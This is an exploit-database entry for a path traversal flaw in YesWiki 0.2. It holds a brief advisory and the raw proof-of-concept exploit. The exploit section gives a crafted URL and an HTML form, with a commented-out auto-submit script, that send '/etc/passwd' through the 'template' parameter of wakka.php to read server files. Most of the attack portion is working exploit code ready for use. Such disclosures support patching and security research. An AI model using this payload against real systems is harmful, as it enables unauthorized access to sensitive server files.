YESWIKI 0.2 - Path Traversal (template param)

vendor:

YesWiki

by:

HaHwul

7,5

CVSS

HIGH

Path Traversal

CWE

Product Name: YesWiki

Affected Version From: yeswiki 0.2

Affected Version To: yeswiki 0.2

Patch Exists: NO

Related CWE: none

CPE: a:yeswiki:yeswiki

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian [Wheezy], Ubuntu

2015

YESWIKI 0.2 – Path Traversal (template param)

YESWIKI 0.2 is vulnerable to Path Traversal. An attacker can exploit this vulnerability to read sensitive files from the server. This vulnerability exists due to insufficient sanitization of user-supplied input to the 'template' parameter in 'wakka.php' script. An attacker can send a specially crafted HTTP request to the vulnerable script and read sensitive files from the server.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

# Exploit Title: YESWIKI 0.2 - Path Traversal (template param)
# Date: 2015-11-10
# Exploit Author: HaHwul
# Exploit Author Blog: http://www.codeblack.net
# Vendor Homepage: http://yeswiki.net
# Software Link: https://github.com/YesWiki/yeswiki
# Version: yeswiki 0.2
# Tested on: Debian [Wheezy] , Ubuntu
# CVE : none
# ===========================================
<!-- Open Browser: http://127.0.0.1/vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&template=/../../../../../../../../../../../../etc/passwd
--><br>
# Exploit Code<br>
# ===========================================
<br><br>

<form name="yeswiki_traversal2_poc" action="http://127.0.0.1/vul_test/yeswiki/wakka.php" method="GET">
<input type="hidden" name="wiki" value="HomePage/diaporama">
Target: Edit HTML Code<br>
File: <input type="text" name="template" value="/../../../../../../../../../../../../etc/passwd"><br>

<input type="submit" value="Exploit">
</form>
<!-- Auto Sumbit
<script type="text/javascript">document.forms.yeswiki_traversal2_poc.submit();</script>
-->